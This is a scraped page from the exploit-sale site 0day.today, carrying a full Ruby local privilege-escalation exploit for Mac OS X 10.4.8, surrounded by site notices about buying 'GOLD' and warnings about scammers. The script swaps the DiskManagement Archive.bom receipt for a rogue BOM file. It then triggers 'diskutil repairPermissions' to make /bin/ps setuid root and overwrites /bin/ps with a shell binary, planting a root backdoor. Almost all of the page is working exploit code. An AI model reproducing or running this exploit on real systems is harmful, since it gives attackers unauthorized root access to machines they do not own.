0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit

Author

MoAB

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

=====================================================================
Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit
=====================================================================



#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] info-pull.com>
#          Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Thanks to The French Connection for bringing this in-the-wild 0-day to
# our attention. If /tmp/ps2 exists on your system, you've been pwned already.
# Thanks to the original authors of the exploit ('meow'). You know who you are.
#
# "They did it for the lulz"   - A Fakecure spokesperson on the 'Mother Of all Bombs'.
# "kcoc kcus I ro tcarter uoY" - The Original Drama P3dobear (Kumo' n').
#

require 'fileutils'

# Basic configuration
TARGET_BINARY       = "/bin/ps"   # Changing this requires you to create a new TEH_EVIL_BOM
TARGET_BACKUP_PATH  = "/tmp/ps2"  # see: "man lsbom" and "man mkbom"
TARGET_SHELL_PATH   = "/usr/bin/id"  # Ensure the binary doesn't drop privileges!
BOMARCHIVE_PATH     = "/Library/Receipts/Essentials.pkg/Contents/Archive.bom"
DISKUTIL_PATH       = "/usr/sbin/diskutil"
TEH_EVIL_BOM        = File.read("Evil.bom")

#
# Repair a rogue installation using the back-up files. Useful for testing.
# Probably you don't want to repair on real pwnage... :-)
#
def do_repair()
  puts "++ Repairing (moving back-ups to original path)"
  puts "++ #{File.basename(BOMARCHIVE_PATH)}"
  FileUtils.rm_f BOMARCHIVE_PATH
  FileUtils.cp File.join("/tmp", File.basename(BOMARCHIVE_PATH)), BOMARCHIVE_PATH
  
  puts "++ #{TARGET_BINARY}"
  FileUtils.rm_f TARGET_BINARY
  FileUtils.cp TARGET_BACKUP_PATH, TARGET_BINARY
  
  puts "++ Removing back-ups..."
  FileUtils.rm_f TARGET_BACKUP_PATH
  FileUtils.rm_f File.join("/tmp", File.basename(BOMARCHIVE_PATH))
  
  puts "++ Done. Repairing disk permissions..."
  exec "#{DISKUTIL_PATH} repairPermissions /"
end

#
# Ovewrite TARGET_BINARY with TARGET_SHELL_PATH and set the rogue permissions unless
# they are already properly set.
#
def exploit_bomb()
  puts "++ We get signal. Overwriting #{TARGET_BINARY} with #{TARGET_SHELL_PATH}."

  # Overwriting with this method will always work well if binary at TARGET_SHELL_PATH
  # is bigger than TARGET_BINARY (ex. /bin/sh is 1068844 bytes and /bin/ps is 68432).
  # An alternative method is running diskutil again to set the rogue permissions.
  over = File.new(TARGET_BINARY, "w")
  over.write(File.read(TARGET_SHELL_PATH))
  over.close
  
  unless FileTest.setuid?(TARGET_BINARY)
    fork do
      FileUtils.rm_f TARGET_BINARY
      FileUtils.cp TARGET_SHELL_PATH, TARGET_BINARY
      exec "#{DISKUTIL_PATH} repairPermissions /"
    end
    Process.wait
  end
  
  puts "++ Done. Happy ruuting."
end

#
# Overwrite the BOM with the rogue version, set new permissions.
#
def set_up_the_bomb()
  puts "++ Preparing to overwrite (#{BOMARCHIVE_PATH})"
  
  # Back-up the original Archive.bom, set mode to 777
  if FileTest.writable?(BOMARCHIVE_PATH)
    backup_path = File.join("/tmp", File.basename(BOMARCHIVE_PATH))
    
    unless FileTest.exists?(backup_path)
      puts "++ Creating backup copy at #{backup_path}"
      FileUtils.cp BOMARCHIVE_PATH, backup_path
    end
  
    puts "++ Removing original file."
    FileUtils.rm_f BOMARCHIVE_PATH
    
    puts "++ Writing backdoor BOM file."
    target_bom = File.new(BOMARCHIVE_PATH, "w")
    target_bom.write(TEH_EVIL_BOM)
    target_bom.close
    puts "++ Done."
  else
    puts "-- Can't write to '#{BOMARCHIVE_PATH}. No pwnage for you today."
    exit
  end
  
  # Back-up the target backdoor path
  unless FileTest.exists?(TARGET_BACKUP_PATH)
    puts "++ Creating backup copy of #{TARGET_BINARY} at #{TARGET_BACKUP_PATH}"
    FileUtils.cp TARGET_BINARY, TARGET_BACKUP_PATH
  end
  
  # Let diskutil do it's job (set permissions over target binary path, setuid)
  puts "++ Running diskutil to set the new permissions for the backdoor..."
  fork do
    exec "#{DISKUTIL_PATH} repairPermissions /"
  end
  Process.wait
  
  puts "++ Somebody set up us the bomb!"
  exploit_bomb()
end

# Here be pwnies
if ARGV[0] == "repair"
  do_repair()
else
  set_up_the_bomb()
end



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit

Report Error

Report Error